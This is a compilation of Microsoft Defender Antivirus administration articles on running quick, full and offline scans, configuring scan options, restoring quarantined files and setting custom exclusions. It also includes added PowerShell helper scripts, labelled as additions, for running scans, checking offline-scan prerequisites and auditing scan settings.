Combined with always-on, real-time protection, which reviews files when they are
opened and closed, and whenever a user navigates to a folder, a quick scan helps
provide strong protection against malware that starts with the system and kernel-level
malware. In most cases, a quick scan is sufficient and is the recommended option for
scheduled or on-demand scans. Learn more about scan types.

) Important

Microsoft Defender Antivirus runs in the context of the LocalSystem account when
performing a local scan. For network scans, it uses the context of the device
account. If the domain device account doesn't have appropriate permissions to
access the share, the scan won't work. Ensure that the device has permissions to
access the network share.

Use Microsoft Defender portal to run a scan

1. Go to the Microsoft Defender portal (https://security.microsoft.com ) and sign-in.
2. Go to the device page that you would like to run a remote scan.
3. Click on the ellipses (…).
4. Click on Run Antivirus Scan.
5. Under Select scan type, select the radio button for Quick Scan or Full Scan.
6. Add a comment.
7. Click on Confirm.

To check on the status:

1. Under Actions & submissions, select Action Center and then select History tab.
2. Click on Filters.
3. Under the Action Type, check the box for Start antivirus scan.
4. Click on Apply.
5. Select one of the radio buttons.
6. Under Action Status, you'll see the status such as Completed.

To check on the detections, see Review the results of Microsoft Defender Antivirus scans.

Use Microsoft Intune to run a scan

Use endpoint security to run a scan on Windows devices


1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com) and sign in.

2. Choose Endpoint security > Antivirus.

3. In the list of tabs, select Windows 10 unhealthy endpoints or Windows 11 unhealthy endpoints.

4. From the list of actions provided, select Quick Scan (recommended) or Full Scan.

Tip

For more information about using Microsoft Configuration Manager to run a scan,
see Antimalware and firewall tasks: How to perform an on-demand scan.

Use devices to run a scan on a single device

1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com) and sign in.

2. From the sidebar, select Devices > All Devices and choose the device you want to
scan.

3. Select ...More and select Quick Scan (recommended) or Full Scan from the
options.

Use the Windows Security app to run a scan


For instructions on running a scan on individual endpoints, see Run a scan in the
Windows Security app.

Use PowerShell cmdlets to run a scan


Use the following cmdlet:

PowerShell

Start-MpScan

Use PowerShell cmdlets to run a quick scan without applying antivirus exclusions

Use the following cmdlet:

PowerShell

Set-MpPreference -QuickScanIncludeExclusions 1

Note

A value of 1 enables the inclusion of the antivirus excluded processes, folders, files,
and extensions. A value of 0 (default) disables the inclusion of the antivirus
excluded processes, folders, files, and extensions.

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets.

Use the mpcmdrun.exe command-line utility to run a scan

Use the following -scan parameter:

Console

mpcmdrun.exe -scan -scantype 1

For more information on how to use the tool and other parameters, including starting a
full scan or defining paths, see Use the mpcmdrun.exe commandline tool to configure
and manage Microsoft Defender Antivirus.

Use Windows Management Instrumentation (WMI) to run a scan

Use the Start method of the MSFT_MpScan class.

For more information about which parameters are allowed, see Windows Defender
WMIv2 APIs.
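The sections above give one cmdlet or one method each for the PowerShell and WMI routes. The following is an added example, not code from the Microsoft Learn article: it wraps Start-MpScan so that a scan type and path can be chosen, temporarily turns on QuickScanIncludeExclusions for a quick scan (restoring the previous value afterwards), and then reads the outcome back from Get-MpComputerStatus and Get-MpThreatDetection. The CIM-based function calls the MSFT_MpScan Start method named above; its ScanType and ScanPath argument names and the 1/2/3 type codes are assumptions taken from the WMIv2 API and should be checked against the reference linked above. The function names Invoke-DefenderScan and Start-DefenderScanViaCim are this example's own.

```powershell
# Added example, not code from the Microsoft Learn article.
# Runs an on-demand Microsoft Defender Antivirus scan from an elevated
# PowerShell prompt and reports what it found. Cmdlet names are those of the
# Defender module referenced above; the MSFT_MpScan Start arguments
# (ScanType, ScanPath) are assumed from the WMIv2 API and should be verified.

#Requires -RunAsAdministrator

function Invoke-DefenderScan {
    [CmdletBinding()]
    param(
        [ValidateSet('QuickScan', 'FullScan', 'CustomScan')]
        [string]$ScanType = 'QuickScan',

        # Only meaningful for CustomScan.
        [string]$ScanPath,

        # For a quick scan, also cover items on the exclusion lists
        # (Set-MpPreference -QuickScanIncludeExclusions 1, as described above).
        # The previous value is restored afterwards so the change is temporary.
        [switch]$IncludeExclusions
    )

    $toggle = $IncludeExclusions -and $ScanType -eq 'QuickScan'
    if ($toggle) {
        $previous = (Get-MpPreference).QuickScanIncludeExclusions
        if ($null -eq $previous) { $previous = 0 }   # property absent on old builds (assumption)
        Set-MpPreference -QuickScanIncludeExclusions 1
    }

    $started = Get-Date
    try {
        if ($ScanType -eq 'CustomScan') {
            if (-not $ScanPath) { throw 'CustomScan requires -ScanPath.' }
            # Start-MpScan blocks until the scan finishes unless -AsJob is used.
            Start-MpScan -ScanType CustomScan -ScanPath $ScanPath
        } else {
            Start-MpScan -ScanType $ScanType
        }
    } finally {
        if ($toggle) { Set-MpPreference -QuickScanIncludeExclusions $previous }
    }

    # Scan timestamps come from the computer status; detections are filtered to
    # those first seen after the scan started.
    $status     = Get-MpComputerStatus
    $detections = @(Get-MpThreatDetection -ErrorAction SilentlyContinue |
        Where-Object { $_.InitialDetectionTime -ge $started })

    [pscustomobject]@{
        ScanType         = $ScanType
        StartedAt        = $started
        LastQuickScanEnd = $status.QuickScanEndTime
        LastFullScanEnd  = $status.FullScanEndTime
        DetectionCount   = $detections.Count
        Detections       = $detections |
            Select-Object ThreatID, Resources, ActionSuccess, InitialDetectionTime
    }
}

# The same action through WMI, as the section above describes: call the Start
# method of the MSFT_MpScan class. ScanType 1 = quick, 2 = full, 3 = custom
# (assumed from the WMIv2 API; check the reference linked above).
function Start-DefenderScanViaCim {
    param(
        [ValidateSet(1, 2, 3)][int]$ScanType = 1,
        [string]$ScanPath
    )
    $methodArgs = @{ ScanType = [uint32]$ScanType }
    if ($ScanPath) { $methodArgs['ScanPath'] = $ScanPath }
    Invoke-CimMethod -Namespace 'root/Microsoft/Windows/Defender' `
        -ClassName 'MSFT_MpScan' -MethodName 'Start' -Arguments $methodArgs
}

# Example usage:
# Invoke-DefenderScan -ScanType QuickScan -IncludeExclusions
# Invoke-DefenderScan -ScanType CustomScan -ScanPath 'C:\Users\Public\Downloads'
# Start-DefenderScanViaCim -ScanType 1
```

Because Start-MpScan runs synchronously, the detection query after it only has to filter on InitialDetectionTime; if you switch to -AsJob you would need to wait on the job before reading results.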

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Run and review the results of a
Microsoft Defender Offline scan
Article • 12/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft Defender for Individuals

Applies to        Type
Platform          Windows
Protection type   Hardware, Firmware/Rootkit, Operating system, Driver, Memory (Heap), Application, Identity, Cloud

Note

The protection for this feature focuses on the Firmware/Rootkit.

Microsoft Defender Offline is an anti-malware scanning tool that lets you boot and run a
scan from a trusted environment. The scan runs from outside the normal Windows
kernel so it can target malware that attempts to bypass the Windows shell, such as
viruses and rootkits that infect or overwrite the master boot record (MBR).

You can use Microsoft Defender Offline Scan if you suspect a malware infection, or you
want to confirm a thorough clean of the endpoint after a malware outbreak.

Prerequisites and requirements


The following are the hardware requirements for Microsoft Defender Offline Scan in
Windows:

x64 Windows 11
x64/x86 Windows 10
x64/x86 Windows 8.1
x64/x86 Windows 7 Service Pack 1

Caution

Microsoft Defender Offline Scan does not apply to:

ARM Windows 11
ARM Windows 10
Windows Server SKUs

For more information about Windows 10 and Windows 11 requirements, see the
following topics:

Minimum hardware requirements
Hardware component guidelines

Microsoft Defender Offline updates


To receive Microsoft Defender Offline Scan updates:

Microsoft Defender Antivirus must be the primary AV (not in passive mode).
Update MDAV, using whatever method you normally use to deploy updates to endpoints,
to a supported version of the:
    Platform update
    Engine update
    Security intelligence update
  You can manually download and install the latest protection updates from the
  Microsoft Malware Protection Center. See the Manage Microsoft Defender Antivirus
  Security intelligence updates topic for more information.
The user must be logged in with local administrator privileges.
Windows Recovery Environment (WinRE) needs to be enabled.

Note

If WinRE is disabled, the WDO scan won't run and no error message is displayed.
Nothing happens even if the machine is restarted manually. To fix this, you only
have to enable WinRE.

To check the WinRE status, run this command line:

reagentc /info

If the status is Disabled, enable it by running this command line:

reagentc /enable

Usage scenarios

When Microsoft Defender Antivirus determines that a Microsoft Defender Offline scan
needs to run:

It prompts the user on the endpoint. The prompt can occur via a notification,
similar to the following:

The user is also notified within the Microsoft Defender Antivirus client, and the
need for a scan can be surfaced in Microsoft Intune if you use it to manage your
Windows endpoints.

You can manually force an offline scan, which is built into Windows 10, version 1607
or newer, and Windows 11. Or, you can scan through bootable media on older Windows
versions, as described later in this article.

In Configuration Manager, you can identify the status of endpoints by navigating to
Monitoring > Overview > Security > Endpoint Protection Status > System Center
Endpoint Protection Status.

Microsoft Defender Offline scans are indicated under Malware remediation status as
Offline scan required.

Configure notifications
Microsoft Defender Offline notifications are configured in the same policy setting as
other Microsoft Defender Antivirus notifications.

For more information about notifications in Windows Defender, see Configure the
notifications that appear on endpoints.

Run a scan

Important

Before you use Microsoft Defender Offline Scan, make sure you save any files and
shut down running programs. The Microsoft Defender Offline scan takes about 15
minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment, so the user interface
looks different from a normal scan performed by Windows Defender. After the
scan is completed, the endpoint is restarted and Windows loads normally.

You can run a Microsoft Defender Offline scan with the following:

The Windows Security app
PowerShell
Windows Management Instrumentation (WMI)

Use the Windows Defender Security app to run an offline scan

Starting with Windows 10, version 1607 or newer, and Windows 11, Microsoft Defender
Offline Scan can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Microsoft Defender Offline Scan to
bootable media, restart the endpoint, and load the bootable media.

Note

In Windows 10, version 1607, the offline scan can be run from Windows Settings >
Update & security > Windows Defender or from the Windows Defender client.

1. Open the Windows Security app:

   In the Start menu, select All apps, then select Windows Security, or
   In the Start menu, select Settings, then select Privacy & security, and then
   select Windows Security, or
   In Search, search for Windows Security, or
   In the taskbar, select the hidden icons (chevron icon pointing up), then click the
   Microsoft Defender Antivirus shield icon.

2. Select Scan options.

3. Select the radio button Microsoft Defender Offline scan and click Scan now.

Note

The process starts from C:\ProgramData\Microsoft\Windows Defender\Offline Scanner.

4. You'll get a prompt to save your work before continuing, similar to the following
image:

After you've saved your work, select Scan.

5. Once you click Scan, you'll get another prompt requesting your permission
to make changes to your device, similar to the following image:

Select Yes.

6. Another prompt will appear informing you that you'll be signed out and Windows
will shut down in less than a minute, similar to the following image:

7. You'll see that the Microsoft Defender Antivirus scan (offline scan) is in progress,
similar to the following image:

Use PowerShell cmdlets to run an offline scan


Use the following cmdlet:

PowerShell

Start-MpWDOScan

See Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets for more information on how to use PowerShell with
Microsoft Defender Antivirus.

Use Windows Management Instrumentation (WMI) to run an offline scan

Use the MSFT_MpWDOScan class to run an offline scan.

The following WMI command will immediately run a Microsoft Defender Offline
scan, which will cause the endpoint to restart, run the offline scan, and then restart and
boot into Windows.

Console

wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start

For more information, see Windows Defender WMIv2 APIs.

In Windows 7 Service Pack 1 and Windows 8.1:

1. Download Windows Defender Offline and install it to a CD, DVD, or USB flash drive
using the following links:

Download the 64-bit version (msstool64.exe)
Download the 32-bit version (msstool32.exe)

If you're not sure which version to download, see Is my PC running the 32-bit or
64-bit version of Windows?

2. To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free
space, and then run the tool. You'll be guided through the steps to create the
removable media.

Tip

We recommend that you do the following when downloading Windows Defender Offline:

Download Windows Defender Offline and create the CD, DVD, or USB flash drive on a
PC that isn't infected with malware, because malware can interfere with the media
creation.
If you use a USB drive, the drive will be reformatted and any data on it will be
erased. Be sure to back up any important data from the drive first.

3. Scan your PC for viruses and other malware.


a. Once you've created the USB drive, CD, or DVD, you'll need to remove it from
your current computer and take it to the computer you want to scan. Insert the
USB drive or disc into the other computer and restart the computer.
b. Boot from the USB drive, CD, or DVD to run the scan. Depending on the
computer's settings, it may automatically boot from the media after you restart
it, or you may have to press a key to enter a "boot devices" menu or modify the
boot order in the computer's UEFI firmware or BIOS.
c. Once you've booted from the device, you'll see a Microsoft Defender tool that
will automatically scan your computer and remove malware.
d. After the scan is complete and you're done with the tool, you can reboot your
computer and remove the Microsoft Defender Offline media to boot back into
Windows.

4. Remove any malware that's found from your PC.


a. If you experience a Stop error on a blue screen when you run the offline scan,
restart your device and try running a Microsoft Defender Offline scan again. If
the blue-screen error happens again, contact Microsoft Support.

Where can I find the scan results?


To see the Microsoft Defender Offline scan results in Windows 10 and Windows 11:

1. Select Start, and then select Settings > Update & Security > Windows Security >
Virus & threat protection.
2. On the Virus & threat protection screen, under Current threats, select Scan
options, and then select Protection history. For more information, see Review
threat detection history in the Windows Security app.

How can I find out if Microsoft Defender Offline scan was kicked off?

In the Event Viewer, go to Applications and Services Logs > Microsoft > Windows >
Windows Defender > Operational. You'll see:

Log Name: Microsoft-Windows-Windows Defender/Operational
Source: Microsoft-Windows-Windows Defender
Event ID: 2030
Level: Information
Description: Microsoft Defender Antivirus downloaded and configured Microsoft
Defender Antivirus (offline scan) to run on the next reboot.

On versions older than Windows 10, version 2004, the description reads:

Windows Defender Antivirus downloaded and configured Windows Defender Offline to
run on the next reboot.

Log Name: Microsoft-Windows-Windows Defender/Operational
Source: Microsoft-Windows-Windows Defender
Event ID: 5007
Level: Information
Description: Microsoft Defender Antivirus Configuration has changed. If this is an
unexpected event, you should review the settings as this may be the result of
malware.
Old value: N/A\Scan\OfflineScanRun =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\OfflineScanRun = 0x0
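The prerequisites list, the WinRE note, the Start-MpWDOScan cmdlet and the two event IDs above fit together as one procedure. The following is an added example, not code from the article: it checks each prerequisite the article names (Defender as primary AV, WinRE enabled, local administrator), starts the offline scan only after confirmation because the device reboots within about a minute, and afterwards pulls events 2030 and 5007 from the Operational log. The function names are this example's own, the AMRunningMode value 'Normal' is used as the "primary AV" indicator, and the parsing of reagentc /info assumes its English output; all three are assumptions.

```powershell
# Added example, not code from the Microsoft Learn article.
# Checks the Microsoft Defender Offline prerequisites listed above, optionally
# starts the offline scan, and reads back the Operational log events (2030,
# 5007) that record it. Assumptions: AMRunningMode 'Normal' means Defender is
# the primary AV; reagentc.exe prints an English "Windows RE status:" line.

function Test-DefenderOfflinePrerequisites {
    $status = Get-MpComputerStatus
    # 'Passive Mode', 'EDR Block Mode' etc. mean another AV is primary and
    # offline-scan updates will not flow.
    $primaryAv = $status.AMRunningMode -eq 'Normal'

    # reagentc requires elevation; treat any failure as "not enabled".
    $reInfo = (& reagentc.exe /info 2>&1) | Out-String
    $winRe  = $reInfo -match 'Windows RE status:\s+Enabled'

    $isAdmin = ([Security.Principal.WindowsPrincipal] `
        [Security.Principal.WindowsIdentity]::GetCurrent()
    ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        DefenderIsPrimaryAv = $primaryAv
        AMRunningMode       = $status.AMRunningMode
        WinReEnabled        = $winRe
        LocalAdmin          = $isAdmin
        EngineVersion       = $status.AMEngineVersion
        SignatureVersion    = $status.AntivirusSignatureVersion
        Ready               = $primaryAv -and $winRe -and $isAdmin
    }
}

function Get-DefenderOfflineScanEvents {
    param([int]$Hours = 24)
    # 2030: offline scan configured to run on the next reboot.
    # 5007: configuration change; the article shows it recording the
    #       HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\OfflineScanRun value,
    #       so only 5007 events that mention that value are kept.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 2030, 5007
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -eq 2030 -or $_.Message -match 'OfflineScanRun' } |
        Select-Object TimeCreated, Id, Message
}

function Start-DefenderOfflineScanChecked {
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param()
    $pre = Test-DefenderOfflinePrerequisites
    if (-not $pre.Ready) {
        Write-Warning "Offline scan prerequisites not met:`n$($pre | Out-String)"
        return $pre
    }
    # ConfirmImpact High makes ShouldProcess prompt by default, since the
    # endpoint signs the user out and restarts shortly after this call.
    $action = 'Start Microsoft Defender Offline scan (restarts the device)'
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, $action)) {
        Start-MpWDOScan
    }
}

# Example usage (run from an elevated prompt):
# Test-DefenderOfflinePrerequisites
# Start-DefenderOfflineScanChecked
# Get-DefenderOfflineScanEvents -Hours 48   # after the device is back up
```

Run Get-DefenderOfflineScanEvents after the endpoint has booted back into Windows; event 2030 confirms the scan was scheduled, and the 5007 entry with the OfflineScanRun value is the configuration change the article describes.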

Related articles
Customize, initiate, and review the results of scans and remediation
Microsoft Defender Antivirus in Windows 10

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Configure Microsoft Defender Antivirus
scanning options
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Use Microsoft Intune to configure scanning options

For more information, see Configure device restriction settings in Microsoft Intune and
Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune.

Use Microsoft Configuration Manager to configure scanning options

For details on configuring Microsoft Configuration Manager (current branch), see How
to create and deploy antimalware policies: Scan settings.

Use Group Policy to configure scanning options

Tip

Download the Group Policy Reference Spreadsheet, which lists the policy settings
for computer and user configurations that are included in the Administrative
template files delivered with Windows. You can refer to the spreadsheet when you
edit Group Policy Objects.

Here are the most recent versions:

Group Policy Settings Reference Spreadsheet for Windows 10 May 2020 Update (2004)
Group Policy Settings Reference Spreadsheet for Windows 11 October 2021 Update (21H2)

1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. In the Group Policy Management Editor, go to Computer configuration and click
Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus, and
then select a location (refer to Settings and locations in this article).

5. Edit the policy object.

6. Click OK, and repeat for any other settings.

Settings and locations

Each entry below gives the policy item and its location in Group Policy, the default
setting if the policy is not configured, and the matching PowerShell Set-MpPreference
parameter or WMI property for the MSFT_MpPreference class ("Not available" where no
parameter or property exists).

Email scanning (Scan > Turn on e-mail scanning). See Email scanning limitations (in this article).
  Default setting: Disabled
  PowerShell parameter / WMI property: -DisableEmailScanning

Script scanning
  Default setting: Enabled
  PowerShell parameter / WMI property: This policy setting allows you to configure
  script scanning. If you enable or do not configure this setting, script scanning is
  enabled. See Defender/AllowScriptScanning.

Scan reparse points (Scan > Turn on reparse point scanning). See Reparse points.
  Default setting: Disabled
  PowerShell parameter / WMI property: Not available

Scan mapped network drives (Scan > Run full scan on mapped network drives)
  Default setting: Disabled
  PowerShell parameter / WMI property: -DisableScanningMappedNetworkDrivesForFullScan

Scan archive files (such as .zip or .rar files) (Scan > Scan archive files)
  Default setting: Enabled
  PowerShell parameter / WMI property: -DisableArchiveScanning. The extensions
  exclusion list will take precedence over this setting.

Scan files on the network (Scan > Scan network files)
  Default setting: Enabled
  PowerShell parameter / WMI property: -DisableScanningNetworkFiles

Scan packed executables (Scan > Scan packed executables)
  Default setting: Enabled
  PowerShell parameter / WMI property: Not available. Scan packed executables were
  removed from the following templates:
  - Administrative Templates (.admx) for Windows 11 2022 Update (22H2)
  - Administrative Templates (.admx) for Windows 11 October 2021 Update (21H2)

Scan removable drives during full scans only (Scan > Scan removable drives)
  Default setting: Disabled
  PowerShell parameter / WMI property: -DisableRemovableDriveScanning

Specify the level of subfolders within an archive folder to scan (Scan > Specify the
maximum depth to scan archive files)
  Default setting: 0
  PowerShell parameter / WMI property: Not available

Specify the maximum CPU load (as a percentage) during a scan (Scan > Specify the
maximum percentage of CPU utilization during a scan)
  Default setting: 50
  PowerShell parameter / WMI property: -ScanAvgCPULoadFactor. The maximum CPU load
  is not a hard limit, but is guidance for the scanning engine to not exceed the
  maximum on average. Manual scans ignore this setting and run without any CPU limits.

Specify the maximum size (in kilobytes) of archive files that should be scanned
(Scan > Specify the maximum size of archive files to be scanned)
  Default setting: No limit
  PowerShell parameter / WMI property: Not available. The default value of 0 applies
  no limit.

Configure low CPU priority for scheduled scans (Scan > Configure low CPU priority for
scheduled scans)
  Default setting: Disabled
  PowerShell parameter / WMI property: Not available

Note

If real-time protection is turned on, files are scanned before they are accessed and
executed. The scanning scope includes all files, including files on mounted
removable media, such as USB drives. If the device performing the scan has real-
time protection or on-access protection turned on, the scan also includes network
shares.

Use PowerShell to configure scanning options

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
the following articles:

Manage Microsoft Defender Antivirus with PowerShell cmdlets
Microsoft Defender Antivirus cmdlets
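An added example, not code from the article, for the PowerShell route: it takes the Set-MpPreference parameters listed in the Settings and locations table, compares the values Get-MpPreference reports against a baseline, and applies only the settings that drift, with -WhatIf support so the change can be previewed. The baseline values are constructed for illustration and are not a recommendation; the $Baseline variable and the two function names are this example's own.

```powershell
# Added example, not code from the Microsoft Learn article.
# Audits and enforces the scanning options from the table above using the
# Set-MpPreference parameter names it lists. The baseline values below are
# constructed for illustration; choose your own.

#Requires -RunAsAdministrator

# Desired state. $true on a Disable* property means that scan type is turned OFF.
$Baseline = @{
    DisableEmailScanning                          = $true    # table default: Disabled
    DisableScanningMappedNetworkDrivesForFullScan = $true    # table default: Disabled
    DisableArchiveScanning                        = $false   # keep archive scanning on
    DisableScanningNetworkFiles                   = $false   # keep network file scanning on
    DisableRemovableDriveScanning                 = $false   # full scans include removable drives
    ScanAvgCPULoadFactor                          = 50       # percent; guidance, not a hard limit
}

function Get-ScanOptionDrift {
    param([hashtable]$Desired = $Baseline)
    $current = Get-MpPreference
    foreach ($name in ($Desired.Keys | Sort-Object)) {
        $actual = $current.$name          # dynamic property lookup by parameter name
        [pscustomobject]@{
            Setting = $name
            Desired = $Desired[$name]
            Actual  = $actual
            # Compare as strings so $true/'True' and 50/'50' line up across types.
            InDrift = ("$actual" -ne "$($Desired[$name])")
        }
    }
}

function Set-ScanOptionBaseline {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([hashtable]$Desired = $Baseline)
    $drift = Get-ScanOptionDrift -Desired $Desired | Where-Object InDrift
    foreach ($item in $drift) {
        if ($PSCmdlet.ShouldProcess($item.Setting, "set to $($item.Desired)")) {
            # Splat one named parameter at a time so a value the cmdlet rejects
            # does not prevent the remaining settings from being applied.
            $single = @{ $item.Setting = $item.Desired }
            try   { Set-MpPreference @single }
            catch { Write-Warning "Could not set $($item.Setting): $_" }
        }
    }
    # Return the post-change state so the caller can confirm drift is gone.
    Get-ScanOptionDrift -Desired $Desired
}

# Example usage:
# Get-ScanOptionDrift | Format-Table -AutoSize
# Set-ScanOptionBaseline -WhatIf
# Set-ScanOptionBaseline -Confirm:$false
```

Note that the table marks several Group Policy items as "Not available" in PowerShell; those (reparse points, archive depth and size, low CPU priority) cannot be audited this way and have to be checked through Group Policy or the Intune or Configuration Manager settings the earlier sections point to.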

Use WMI to configure scanning options


See Windows Defender WMIv2 APIs.

Email scanning limitations


Email scanning enables scanning of email files used by Outlook and other mail clients
during on-demand and scheduled scans. Embedded objects within email (such as
attachments and archived files) are also scanned. The following file format types can be
scanned and remediated:

DBX
MBX
MIME

PST files used by Outlook 2003 or older (where the archive type is set to non-unicode)
are also scanned, but Microsoft Defender Antivirus cannot remediate threats that are
detected inside PST files.

If Microsoft Defender Antivirus detects a threat inside an email message, the following
information is displayed to assist you in identifying the compromised email so you can
remediate the threat manually:

Email subject
Attachment name

Scanning mapped network drives


On any OS, only the network drives that are mapped at the system level are scanned.
User-level mapped network drives aren't scanned. User-level mapped network drives are
those that a user maps manually in their own session, using their own credentials.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Restore quarantined files in Microsoft
Defender Antivirus
Article • 08/28/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Depending on how Microsoft Defender Antivirus is configured, it quarantines suspicious
files. If you're certain a quarantined file isn't a threat, you can restore it on your
Windows device.

1. On your Windows device, open Windows Security.

2. Select Virus & threat protection and then, under Current threats, select Protection
history.

3. If you have a list of items, you can filter on Quarantined Items.

4. Select an item you want to keep, and choose an action, such as Restore.

Tip

You can also restore a file from quarantine by using Command Prompt. See Restore
file from quarantine.

See also
Configure remediation for scans
Review scan results

Tip

If you're looking for Antivirus related information for other platforms, see:
Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Configure custom exclusions for
Microsoft Defender Antivirus
Article • 01/02/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus.
However, if necessary, you can exclude files, folders, processes, and process-opened files
from Microsoft Defender Antivirus scans. These types of exclusions are known as custom
exclusions. This article describes how to define custom exclusions for Microsoft
Defender Antivirus with Microsoft Intune and includes links to other resources for more
information.

Custom exclusions apply to scheduled scans, on-demand scans, and always-on real-time
protection and monitoring. Exclusions for process-opened files only apply to real-time
protection.

Tip

For a detailed overview of suppressions, submissions, and exclusions across
Microsoft Defender Antivirus and Defender for Endpoint, see Exclusions for
Microsoft Defender for Endpoint and Microsoft Defender Antivirus.

Configure and validate exclusions

Caution

Use Microsoft Defender Antivirus exclusions sparingly. Make sure to review the
information in Manage exclusions for Microsoft Defender for Endpoint and
Microsoft Defender Antivirus.

If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft
Defender for Endpoint, use the following procedures to define exclusions:

Manage antivirus exclusions in Intune (for existing policies)
Create a new antivirus policy with exclusions in Intune

If you're using another tool, such as Configuration Manager or Group Policy, or you
want more detailed information about custom exclusions, see these articles:

Configure and validate exclusions based on file extension and folder location
Configure exclusions for files opened by processes

Manage antivirus exclusions in Intune (for existing policies)


1. In the Microsoft Intune admin center, choose Endpoint security > Antivirus, and
then select an existing policy. (If you don't have an existing policy, or you want to
create a new policy, skip to Create a new antivirus policy with exclusions in Intune.)

2. Choose Properties, and next to Configuration settings, choose Edit.

3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions.

   Excluded Extensions are exclusions that you define by file type extension.
   These extensions apply to any file name that has the defined extension,
   without the file path or folder. Separate each file type in the list with a |
   character. For example, lib|obj. For more information, see ExcludedExtensions.
   Excluded Paths are exclusions that you define by their location (path). These
   types of exclusions are also known as file and folder exclusions. Separate
   each path in the list with a | character. For example, C:\Example|C:\Example1.
   For more information, see ExcludedPaths.
   Excluded Processes are exclusions for files that are opened by certain
   processes. Separate each process in the list with a | character. For example,
   C:\Example.exe|C:\Example1.exe. These exclusions aren't for the actual
   processes. To exclude processes, you can use file and folder exclusions. For
   more information, see ExcludedProcesses.

4. Choose Review + save, and then choose Save.

Create a new antivirus policy with exclusions in Intune

1. In the Microsoft Intune admin center, choose Endpoint security > Antivirus > +
Create Policy.

2. Select a platform (such as Windows 10, Windows 11, and Windows Server).

3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose
Create.

4. On the Create profile step, specify a name and description for the profile, and then
choose Next.

5. On the Configuration settings tab, specify your antivirus exclusions, and then
choose Next.

   Excluded Extensions are exclusions that you define by file type extension.
   These extensions apply to any file name that has the defined extension,
   without the file path or folder. Separate each file type in the list with a |
   character. For example, lib|obj. For more information, see
   ExcludedExtensions.
   Excluded Paths are exclusions that you define by their location (path). These
   types of exclusions are also known as file and folder exclusions. Separate
   each path in the list with a | character. For example, C:\Example|C:\Example1.
   For more information, see ExcludedPaths.
   Excluded Processes are exclusions for files that are opened by certain
   processes. Separate each process in the list with a | character. For example,
   C:\Example.exe|C:\Example1.exe. These exclusions aren't for the actual
   processes. To exclude processes, you can use file and folder exclusions. For
   more information, see ExcludedProcesses.

6. On the Scope tags tab, if you're using scope tags in your organization, specify
scope tags for the policy you're creating. (See Scope tags.)

7. On the Assignments tab, specify the users and groups to whom your policy should
be applied, and then choose Next. (If you need help with assignments, see Assign
user and device profiles in Microsoft Intune.)

8. On the Review + create tab, review the settings, and then choose Create.

Important points about exclusions


Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You
should always evaluate the risks that are associated with implementing exclusions, and
you should only exclude files that you're confident aren't malicious.

Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate,
or inspect events related to the files, folders, or processes that are added to the
exclusion list. Custom exclusions can affect features that are directly dependent on the
antivirus engine (such as protection against malware, file IOCs, and certificate IOCs).
